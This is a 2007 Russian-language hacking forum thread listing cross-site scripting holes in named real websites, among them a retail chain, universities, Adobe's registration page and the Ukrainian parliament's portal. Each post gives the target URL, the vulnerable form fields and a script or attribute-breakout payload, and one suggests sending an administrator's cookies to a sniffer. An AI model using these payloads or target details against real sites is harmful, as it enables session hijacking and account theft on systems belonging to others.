HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

xss
  #101  
Старый 31.10.2007, 02:05
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами: 10041506

Репутация: 572
Arrow xss

netprint.ru

Регистрируемся, создаем альбом с любым именем и грузим фотографию, которую переименовываем в <script>alert()</script>

Укладываемся в 40 символов.
 
Ответить с цитированием

  #102  
Старый 03.11.2007, 03:31
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами: 9874372

Репутация: 138
По умолчанию

ЛЕНТА - сеть гипермаркетов
Код:
http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>
 
Ответить с цитированием

  #103  
Старый 03.11.2007, 17:54
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

Цитата:
Сообщение от phol1eadeux  
ЛЕНТА - сеть гипермаркетов
Код:
http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>
Ошибся разделом, это пассивная
 
Ответить с цитированием

  #104  
Старый 03.11.2007, 18:00
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами: 9874372

Репутация: 138
По умолчанию

Разобрался

Последний раз редактировалось phol1eadeux; 03.11.2007 в 19:01..
 
Ответить с цитированием

  #105  
Старый 04.11.2007, 02:45
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами: 10263663

Репутация: 1559


По умолчанию

http://nsti.ru/guest/

Гостевая книга

Добавляем во все формы: "onmouseover="alert('xss')"
 
Ответить с цитированием

  #106  
Старый 04.11.2007, 21:46
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

Код:
www.miem.edu.ru
Заходим в раздел выпускники и регистрируем себя. Уязвимые поля: город, адрес, icq, web.
Код:
http://www.econ.msu.ru/
Регистрируемся, уязвимые поля в регистрации: Фамилия, Имя
Код:
http://www.rapway.com.ru/
Гостевая книга. Уязвимые поля: Имя, E-mail, ICQ, Сайт
Код:
www.saletime.biz
Гостевая книга. Уязвимо поле: Имя
Код:
http://livemy.info
Регистрируемся, идем в раздел "События", уязвимое поле - описание события.
Код:
http://blog.inf.by
Регистрируемся, уязвимое поле: Название блога

Че-то пост разросся =)

Последний раз редактировалось ZAMUT; 07.11.2007 в 01:56..
 
Ответить с цитированием

  #107  
Старый 07.11.2007, 01:57
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

Верховная Рада Украины =)
Код:
http://portal.rada.gov.ua
Регистрируемся, уязвимые поля: Имя, Ответ на секретный вопрос, Прозвiще вроде =)
 
Ответить с цитированием

  #108  
Старый 07.11.2007, 02:58
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Adobe.com

регимся здесь

Код:
https://www.adobe.com/cfusion/membership/index.cfm?nf=1&loc=en%5Fus
при регистрации вставляем в любое поле
<script>alert(12121)</script>

кроме e-mail, password, zip-code...

заходим в свой аккаунт и видим активную XSS...
Можно предположить, что админ сможет просмотреть аккаунт пользователя, а заодно и отправить куки на снифф
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #109  
Старый 07.11.2007, 20:22
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

http://www.pcgames.lt
Уязвимые поля при регистрации:Nick,Vardas,Pavardė
 
Ответить с цитированием

  #110  
Старый 08.11.2007, 22:53
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

www.omen.ru
Уязвимые поля при регистрации:Имя,О себе кратко, О себе подробно, возможно еще множество полей, дальше проверять не стал, ибо смысла не вижу =)
P.S. Сорри за 2ой пост =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.